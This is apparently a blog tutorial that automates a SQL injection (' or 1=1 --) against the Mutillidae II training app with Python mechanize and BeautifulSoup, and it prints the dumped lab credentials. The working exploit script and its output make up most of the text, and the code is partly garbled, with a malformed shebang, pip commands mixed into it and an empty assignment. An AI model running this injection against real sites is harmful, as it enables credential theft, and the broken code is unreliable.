Python is a great tool to automate things and make things easier for you. Here I am going to show how to automate SQL-injection using Mechanize and BeautifulSoup Python packages. The target I am taking is Mutillidae II. The link in my case is http://192.168.178.25/mutillidae/index.php?page=user-info.php. You may have a different local IP address.
! /usr/bin/python pip install mechanize pip install beautifulsoup4 import mechanize,urllib,sys from bs4 import BeautifulSoup br = mechanize.Browser() br.open(sys.argv) #give vulnerable link on command line br.select_form(nr=0) #select the first form br.form[\'username\']= "\' or 1=1 -- " #inject our payload to the username field br.submit() #Submit the form resp_html = br.response().read() #read the response soup = BeautifulSoup(resp_html,\'lxml\') #parse the html code with lxml parser data_list= # create empty list for item in soup.find_all(\'span\'): # iterate upon span tags and get there text values data_list.append(item.get_text()) data_list = data_list[12:] #we are not interested in data list upto index 11 Count = 0 for item in data_list: # modify the data list to look pretty Count += 1 print item, if Count%6 == 0: print ""
In terminal run the python script with vulnerable link.
python script_name.py http://192.168.178.25/mutillidae/index.php?page=user-info.php
To understand better you have to see the source code of vulnerable code before and after the injection happens.
Username= admin Password= admin Signature= g0t r00t? Username= adrian Password= somepassword Signature= Zombie Films Rock! Username= john Password= monkey Signature= I like the smell of confunk Username= jeremy Password= password Signature= d1373 1337 speak Username= bryce Password= password Signature= I Love SANS Username= samurai Password= samurai Signature= Carving fools Username= jim Password= password Signature= Rome is burning Username= bobby Password= password Signature= Hank is my dad Username= simba Password= password Signature= I am a super-cat Username= dreveil Password= password Signature= Preparation H Username= scotty Password= password Signature= Scotty do Username= cal Password= password Signature= C-A-T-S Cats Cats Cats Username= john Password= password Signature= Do the Duggie! Username= kevin Password= 42 Signature= Doug Adams rocks Username= dave Password= set Signature= Bet on S.E.T. FTW Username= patches Password= tortoise Signature= meow Username= rocky Password= stripes Signature= treats? Username= tim Password= lanmaster53 Signature= Because reconnaissance is hard to spell Username= ABaker Password= SoSecret Signature= Muffin tops only Username= PPan Password= NotTelling Signature= Where is Tinker? Username= CHook Password= JollyRoger Signature= Gator-hater Username= james Password= i<3devs Signature= Occupation: Researcher Username= user Password= user Signature= User Account Username= ed Password= pentest Signature= Commandline KungFu anyone?
Data for Noobs like me:
Install Mechanize and BeautifulSoup Python packages. Import the required libraries. Then request to open the vulnerable link, find the form and inject the payload into the username field and then submit the form.
The link after submission looks like this “http://192.168.178.25/mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1+–+&password=&user-info-php-submit-button=View+Account+Details“
Fetch the response into resp_html variable and parse it into lxml parser. Then with the help of BeautifulSoup find the <span> tags (that is where our data lies). There are multiple ways to get this data, it all depends on your thinking. Maybe my way is longer than what you can think.\r\n\r\nFirst for loop to iterate on the list of span tags to get text data. After that, I prune out first 11 elements of the list, as they are not of our interest (see the source code of page after injection). Second loop is to make data look more fancy.\r\n\r\nThe things we can do with this are limitless, we can use automation to check XSS, SQL injection, and all other beautiful attacks that we use in Web app pentesting. That\’s it Thank You for reading.’, ‘Automate SQL-injection with Mechanize and BeautifulSoup in Python